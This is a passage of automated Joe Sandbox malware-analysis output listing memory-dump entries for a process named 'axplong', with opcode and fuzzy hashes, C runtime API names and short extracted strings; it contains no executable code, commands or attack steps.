                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c882d04414e136c7f4df02d1aaacd51d92b68dd1df6997a2aa7717dde50375b
                      • Instruction ID: 218fc4e0b39e0e054c38c1763f499de962d96e32dd46f475ad72c4eb15db7f93
                      • Opcode Fuzzy Hash: 7c882d04414e136c7f4df02d1aaacd51d92b68dd1df6997a2aa7717dde50375b
                      • Instruction Fuzzy Hash: 7221B673F204394B770CC47E8C572BDB6E1C68C541745823AE8A6EA2C1D96CD917E2E4
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e7f52769ebb950d961ccc53154d3774a8448d1313783a160089842bff32c65af
                      • Instruction ID: 1be4dca6b908a38e3c597e8ecf6afb9c1012a0dce6b7b10345ac62b268b47e6b
                      • Opcode Fuzzy Hash: e7f52769ebb950d961ccc53154d3774a8448d1313783a160089842bff32c65af
                      • Instruction Fuzzy Hash: 91117723F30C255A675C816D8C172BAA5D2DBD825071F533AD826E72C4E994DE23D290
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: e338465a1e1601585ca9ccb8890e3b9ce0c22a5fbd91380d22ea3688640fec40
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: A0115B7B20014243D78486BDD8F85F6E796EBD5321B3C437AD1414B7D8DE2AD9C4D902
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 296ac83322da6771ac808ff95b4b416bfbda5563475e42fb5fa59322046085c4
                      • Instruction ID: 5ae89a4762a653c494e2dd4546494e6c7ec75f9e9f0d3608d0ec88cfaacb7aa1
                      • Opcode Fuzzy Hash: 296ac83322da6771ac808ff95b4b416bfbda5563475e42fb5fa59322046085c4
                      • Instruction Fuzzy Hash: F5E08C30041A88FFDE257B54CC19E8C3BAAEF01744F004910F8045A261CFB9EEA2C980
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: 9f7935d539b45a0352a045427c669dc3cff2ec5e66eb0c50695a064d74d9f94e
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: 19E0B672915228FBCB15DB98894898AF2FCEB49B54F654596B501D3291C274DF00C7D1
                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Similarity
                      • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                      • String ID:
                      • API String ID: 57040152-0
                      • Opcode ID: 7ff5ea646185f74e11e69adfbd021a8942667ddc04251e7b019ed998a2e79c30
                      • Instruction ID: 94150e9eef84a35663afa75b3a0d475e64c34a2f6638ecdc57981a3a85dd129c
                      • Opcode Fuzzy Hash: 7ff5ea646185f74e11e69adfbd021a8942667ddc04251e7b019ed998a2e79c30
                      • Instruction Fuzzy Hash: 29A1DFB0D013569FDB11DF65C845BAAB7BABF15320F00852EE815D7341EB34EA05CB92
                      APIs
                      • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 006E795C
                      • __Cnd_destroy_in_situ.LIBCPMT ref: 006E7968
                      • __Mtx_destroy_in_situ.LIBCPMT ref: 006E7971
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Similarity
                      • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                      • String ID: 'knd+s$@yn$d+s
                      • API String ID: 4078500453-591370547
                      • Opcode ID: d1390c8949c3f6fd6d165de2a0d2e4e76486e50eb2b181017f74e078b12758a5
                      • Instruction ID: 8406d0277a0ddaf05a6f02583dece9f4c959322ce7e9d69e203686e24dce31dd
                      • Opcode Fuzzy Hash: d1390c8949c3f6fd6d165de2a0d2e4e76486e50eb2b181017f74e078b12758a5
                      • Instruction Fuzzy Hash: 983103B29053449FD720DF69D845A6BB7E9EF14310F100A3EE945C3342E771EA54C3A1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: 37b034399fd2eed71d3cbc10a0b6a8f0bd036ecf59b67cb2a7652f976cfd9fac
                      • Instruction ID: de5e6a883657f08a62ef3482e1fd744c472588aeb44d629adbc6ea6639983da7
                      • Opcode Fuzzy Hash: 37b034399fd2eed71d3cbc10a0b6a8f0bd036ecf59b67cb2a7652f976cfd9fac
                      • Instruction Fuzzy Hash: 7C010C37E1C22AE1961C155CAC0263B17C85BC2BB471A021AF954F73C2DE4CFC03D1A0
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 006D2806
                      • ___std_exception_destroy.LIBVCRUNTIME ref: 006D28A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Similarity
                      • API ID: ___std_exception_copy___std_exception_destroy
                      • String ID: P#m$P#m
                      • API String ID: 2970364248-2422574832
                      • Opcode ID: 84d1b04c8104b9bc96912e26288c76606559fae619f788205c07dbc2d667237a
                      • Instruction ID: 0a9c28c462d1a7b4f4a945ecbcf3fb6fc2b758ed7c219447e3bcf8bf6738908f
                      • Opcode Fuzzy Hash: 84d1b04c8104b9bc96912e26288c76606559fae619f788205c07dbc2d667237a
                      • Instruction Fuzzy Hash: 4E718071E00249DFDB04CFA8C891ADDFBB5EF58310F14826EE805A7381E775A944CBA5
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 006D2B23
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#m$P#m$This function cannot be called on a default constructed task
                      • API String ID: 2659868963-4216301011
                      • Opcode ID: 44cb7c464a381bdcdd4b81f50cf730e30f7a6ad6f5fd175737e31ed607295fac
                      • Instruction ID: a2d3318d52d70b2a986af057bd8bd80dddaa3a8498653a7ea971a85ef4e3e01b
                      • Opcode Fuzzy Hash: 44cb7c464a381bdcdd4b81f50cf730e30f7a6ad6f5fd175737e31ed607295fac
                      • Instruction Fuzzy Hash: 03F0F670A1030C9BC714DF69A8419DEB7EEDF14300F5041AEF80497301EB74AA548BA9
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 006D247E
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: 'knd+s$P#m$P#m
                      • API String ID: 2659868963-3219173019
                      • Opcode ID: 956ccab84050af0c6b72d736aa6c3b88a922b54185f88c1bd3499e49bcb368a8
                      • Instruction ID: 40577e41e353ac992d50a3f8df0aa889e155f2c97d5383aefa18a7a2bdd57f56
                      • Opcode Fuzzy Hash: 956ccab84050af0c6b72d736aa6c3b88a922b54185f88c1bd3499e49bcb368a8
                      • Instruction Fuzzy Hash: 52F0E5B1D1020DA7C714EBE4E805C89B3ECDE15300B008A36F644E7A01F774FA5487E5
                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: 082ecb812ee3a324c839d005f9d9ae2aacac8a6d91682eca5a3988c65d0bc8d9
                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction Fuzzy Hash: 2FB12772A00285DFEB16CF68C8817AEBBE5EF55350F1483AAE8559B3C1D63C9D41CB60
                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: 532d30489d0d28d71054bf8dd91c13d39b5585492257779617c9d103f481ac2b
                      • Instruction ID: 5c16708047c159b0d6c1161f369278c68a8ea63face65d9b7169438046ae22bb
                      • Opcode Fuzzy Hash: 532d30489d0d28d71054bf8dd91c13d39b5585492257779617c9d103f481ac2b
                      • Instruction Fuzzy Hash: 0A215371A023499FDF10EFA5CC459FEBBBAEF08720F104069F501A7261DB34AD028BA5
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 006E726C
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: @.m$`zn
                      • API String ID: 3366076730-2638107607
                      • Opcode ID: af51ed715edc4c8224fd6d43cd606139d9bfdb1ebf3f518d25cdb29ff41c8e86
                      • Instruction ID: 033223a88629cd39cb3d8f679b369af0a76f8595e506585976383a8ae04741da
                      • Opcode Fuzzy Hash: af51ed715edc4c8224fd6d43cd606139d9bfdb1ebf3f518d25cdb29ff41c8e86
                      • Instruction Fuzzy Hash: C3A126B0E027598FDB21CFA9C98479EBBF1BF48710F188159E919AB351E7759D01CB80
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Similarity
                      • API ID: ___free_lconv_mon
                      • String ID: 8"s$`'s
                      • API String ID: 3903695350-2260233155
                      • Opcode ID: 912c7205078118071e4bdb44ff0650adc516b4188777369d61b493c9ea162b3b
                      • Instruction ID: 416002f5adc3ccf4e91e14932aedc5d94d2d9a102334e5a1cbd061a6ac84d5d4
                      • Opcode Fuzzy Hash: 912c7205078118071e4bdb44ff0650adc516b4188777369d61b493c9ea162b3b
                      • Instruction Fuzzy Hash: 93313931604305EFEB31AB78D949B5BB3E9BF40320F154629E45AD76D1DF79AC808B21
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 006D3962
                      • __Mtx_init_in_situ.LIBCPMT ref: 006D39A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: pBm
                      • API String ID: 3366076730-1526497568
                      • Opcode ID: 323ff7d29d5e5ffaecc2a647ba0bc5179dcadd21559c661b307201824ff5dc10
                      • Instruction ID: 40fc910a7cf79aff5a86188afc6d9fa6feb5e3378643f11cb847d9e4abf7abdc
                      • Opcode Fuzzy Hash: 323ff7d29d5e5ffaecc2a647ba0bc5179dcadd21559c661b307201824ff5dc10
                      • Instruction Fuzzy Hash: D34135B0601B058FD720CF19C588B9ABBF1FF44315F14861EE96A8B341E7B4EA15CB81
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 006D2552
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#m$P#m
                      • API String ID: 2659868963-2422574832
                      • Opcode ID: 39c7459c8f36b893cb8f190eef7c9715a2f1c8621b91245d55db8287e0ed4385
                      • Instruction ID: c78338a13d3ffb021fef9f9bbfbdb951c9411b1d495038a27ad992f2df42dafd
                      • Opcode Fuzzy Hash: 39c7459c8f36b893cb8f190eef7c9715a2f1c8621b91245d55db8287e0ed4385
                      • Instruction Fuzzy Hash: 81F0A771E1120DDBC714DF68D84198EBBF9AF55300F1082AEF44467201EB746B59CBD9